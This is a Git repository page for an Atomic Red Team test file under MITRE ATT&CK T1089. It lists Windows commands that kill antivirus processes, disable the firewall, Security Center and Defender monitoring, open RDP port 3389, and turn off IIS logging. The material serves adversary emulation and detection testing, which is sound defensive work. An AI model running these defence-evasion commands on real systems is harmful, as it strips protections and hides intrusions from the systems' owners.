security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5f848fe2c19d948c3ef18f2becedf335fdff3c8e
atomic-red-team/Windows/Defense_Evasion/Disabling_Security_Tools.md
T
Rahmat Nurfauzi ec5af82e6e Update Disabling_Security_Tools.md
2018-04-13 20:29:22 +07:00

1.5 KiB
Raw Blame History

Disabling Security Tools

MITRE ATT&CK Technique: T1089

Terminate Anti-Virus Processes

Taskkill /F /IM avprocess.exe

Disable Firewall

netsh firewall set opmode disable

Stop Windows Security Center

net stop wscsvc

Add Local Firewall Rule Exceptions : Enable a Program

netsh advfirewall firewall add rule name="My Application" dir=in action=allow program="C:\MyApp\MyApp.exe" enable=yes

Add Local Firewall Rule Exceptions : Enable a Port

netsh advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Disable The LAN Network Connection

netsh interface set interface name="Local Area Connection" admin=disabled

Stop Windows Defender

Windows 7/8

net stop windefend

Windows 10

PS > Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
PS > Set-MpPreference -DisableIOAVProtection $true -Verbose
PS > Set-MpPreference -DisableBehaviorMonitoring $true -Verbose
PS > Set-MpPreference -DisableIntrusionPreventionSystem $true -Verbose
PS > Set-MpPreference -DisablePrivacyMode $true -Verbose

Disable Default Web Site Logging IIS 7

Disable Default Web Site Logging IIS 7

%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost

Restart Default Web Site IIS 7

%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"

Reference in New Issue View Git Blame Copy Permalink